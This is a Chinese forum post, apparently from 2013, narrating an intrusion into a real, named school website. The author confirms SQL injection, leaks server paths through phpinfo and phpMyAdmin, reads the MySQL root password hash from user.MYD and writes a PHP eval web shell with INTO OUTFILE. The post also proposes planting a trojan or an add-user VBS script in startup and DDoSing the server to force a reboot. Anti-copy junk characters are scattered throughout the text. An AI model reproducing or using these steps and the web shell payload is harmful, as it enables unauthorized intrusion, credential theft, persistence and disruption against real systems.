第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏. x" n) m5 ?( S, _
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
; I, c. }; D5 L2 n% f
4 P1 |8 f& U# Y" A5 W
9 d+ f. w8 y( H( c/ _0 V1 _ r8 w4 d" Q; @( M( P
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
$ n0 A) w4 Q. S' F- Y4 j
# c2 S* x6 N' J8 V! h那么想可以直接写入shell ,getshell有几个条件:
& M: d- H( X6 h1 x5 P7 O. E9 I& v1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
3 ]4 r' T, g6 A1 i& z8 ]" r. X* r3 y2 e* j6 m: Z
试着爆绝对路径: ( Y0 s8 t y9 D
1./phpMyAdmin/index.php?lang[]=1 ; d! i; l" I: `
2./phpMyAdmin/phpinfo.php 1 K$ [* R% u0 {5 j3 i0 ^$ L; o% L
3./load_file() * p E1 _7 [* h2 G
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
7 }% W0 t7 Z7 K, {; A8 K5./phpmyadmin/libraries/select_lang.lib.php
! l0 M1 a9 I0 ^2 J# [6./phpmyadmin/libraries/lect_lang.lib.php
) L {7 J$ E0 I2 g7./phpmyadmin/libraries/mcrypt.lib.php . |! [. ?! ~. i) x/ j& @& C, F
8./phpmyadmin/libraries/export/xls.php . }. T6 S: l: y1 h
9 z/ o3 S" J' c# X# |
均不行...........................
0 C; z* l3 I, j$ e4 S3 T% _/ }# m+ H& x" v5 `
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
$ E& C! Q1 A* h5 C( m4 y6 A9 {" L) Y0 J
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin . \" h) p7 S8 R9 E3 M$ G
/ h1 L% \# j( B ?4 ^7 K
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
5 \' R* Y# u3 H5 [6 [, H: q; U+ `/ _+ n# K# t
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
+ G3 F; L/ l2 W C
5 k# W. D8 s* o0 }$ r想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
7 Z8 p: n+ x8 o0 B2 P) s# ]
5 X% i) d4 y1 e, r! Hhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 8 A6 ^) \& v I& v( O8 s% E7 v+ K
; I& t% \1 L+ v, V5 k0 e# A7 n自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
5 l: D$ l Z5 U
* E" M9 k7 ]( w成功读到root密码:
9 I+ L9 O7 F6 x) f. O, q
" M( _ |( N' ?17---- r(0072) & C1 Y( v" M- d1 F, m
18---- o(006f) ! w) O. r% G# q3 @0 L. g
19---- o(006f) # k, \" J) n/ X8 M/ _8 c
20---- t(0074)
$ `4 e! Q0 T! O/ }6 [2 u21---- *(002a) $ I; e3 |% y$ r$ C+ G6 d! h
22---- 8(0038) ( _* l, J# o7 R
23---- 2(0032)
g9 T1 Y% u! c2 c# ~7 r1 B3 D24---- E(0045)
$ M3 v# @& r, _' f) y25---- 1(0031)
1 e5 ^! M/ }, F- V+ j26---- C(0043) , \1 h# W! W& u) u s6 d
27---- 5(0035)
# ]7 a `! X* W2 C28---- 8(0038) ) s( X1 R% H% t$ @- t# I& x
29---- 2(0032)
C& j V% P4 i, G7 Q1 S30---- 8(0038)
! c" U" |, }9 f' L0 K/ o/ p7 ?31---- A(0041) & Q O( Y8 \3 x N9 ^
32---- 9(0039) , h! b7 `$ n" n& D
33---- B(0042)
. h! s/ l1 z: M1 U34---- 5(0035) ) F$ o: i* {9 l1 F( K" Q! e7 M
35---- 4(0034)
1 e& _( H; s. Y! g; @& z$ ~2 t; z36---- 8(0038) 2 f8 y6 y3 t3 p) p: y0 ^
37---- 6(0036) 9 g9 M9 q+ _9 I6 [
38---- 4(0034)
, h% _" |' j/ L% T39---- 9(0039) / ?* c7 X- X" y& h0 f. M m& W
40---- 1(0031) ; p& ]6 |* P; `: f
41---- 1(0031) ! \' l+ |9 n1 m5 w$ |
42---- 5(0035)
3 b3 V. G0 K# J/ J' a$ H! }43---- 3(0033) 1 S+ ^0 }: t* I/ |% X1 T/ @
44---- 5(0035)
- l9 n( N$ k8 r. i% F0 ~3 L45---- 9(0039) 2 P q8 N/ ]4 s4 v9 F, g W e
46---- 8(0038) : \8 H; n7 h: v5 O( t5 q2 f) P
47---- F(0046) ; h3 @# }: ?# J% g: o; @0 M
48---- F(0046) ! N+ C. o6 x- [; z
49---- 4(0034) . c# B" n- ^6 S8 ]
50---- F(0046)
1 L: J+ w5 _+ a0 A51---- 0(0030)
! [& J: i8 @. x4 \) f2 D+ @- E, X' s+ B52---- 3(0033) + z; A+ J7 t6 N: `4 P) N
53---- 2(0032) 6 E0 R a$ P- W
54---- A(0041) 5 u$ }2 Y" Z/ y/ W
55---- 4(0034)
: t% J* r) A" P% H* ~6 R$ L1 Z' w56---- A(0041) 4 E4 \& D2 I0 A8 S1 V* N( G
57---- B(0042) ( Z! L& r* s4 `7 [7 _1 |
58---- *(0044) 7 m% ]% `% U' w/ A
59---- *(0035)
Q1 K, ]7 U0 e! w @60---- *(0041) 5 j. }7 c$ n' a9 [% x) k
61---- *0032) l6 T) t# A* Q' J9 D$ L8 A/ d! t
4 [/ [$ b- O8 ?# T) T. G
解密后成功登陆phpmyamin
( ~& W( O2 \- _0 \/ E! M3 N 5 s! u5 t! u& N* R+ F* V
G o9 z8 ~) O ( V9 g- q6 {2 X6 N! c9 t5 ]0 x
. k* V4 _9 Q& w. y* t! B( Q
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' ) ?" L5 U% A+ a% t& V, G8 |+ }
# Y9 w$ O4 v. H. }# p成功执行,拿下shell,菜刀连接: # O. G5 m% m. j+ F" H- O% n) Y
. \) A3 _/ p: z G2 l- B服务器不支持asp,aspx,php提权无果...................
9 o' T" O5 L/ T1 |/ {! N" `
3 s0 p, e' d7 |1 g5 }4 _$ F8 i- [0 F但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: : E7 S& H5 U* A" ~$ N/ [2 i
服务器上已经有个隐藏帐号了 " |6 j* W7 B+ t. t+ z8 g
别名 administrators
2 F6 K6 ~0 Y# r" a7 Q* D注释 管理员对计算机/域有不受限制的完全访问权 # u) J8 a: o# v: w" H: {9 P+ T
成员
- y& ?7 b2 ~0 k-------------------------------------------------------------------------------
# W* \* q+ j* O! E8 S$ z1 xadmin$ f# p, { D! j& A! j
Administrator
2 r9 {7 z& ]0 k9 { Fslipper$
) s9 e" F/ E7 s. a3 \3 `sqluser) ]# `' a# ?: ~) [) \! u5 _5 m/ K, R
命令成功完成。
' f) S; e Z: M( L8 m( W3 @, v( m+ U0 ?8 h) _! v/ y: _$ J
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。' L2 g) x5 u) p5 ~5 W
9 B# q6 E. |- I! U' [ddos服务器重启,不然就只能坐等服务器重启了...............................
3 K+ A; A5 q2 I- ]6 f: |2 a: c0 _+ _9 c- b
0 m; Y/ s8 E; D" l; J
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
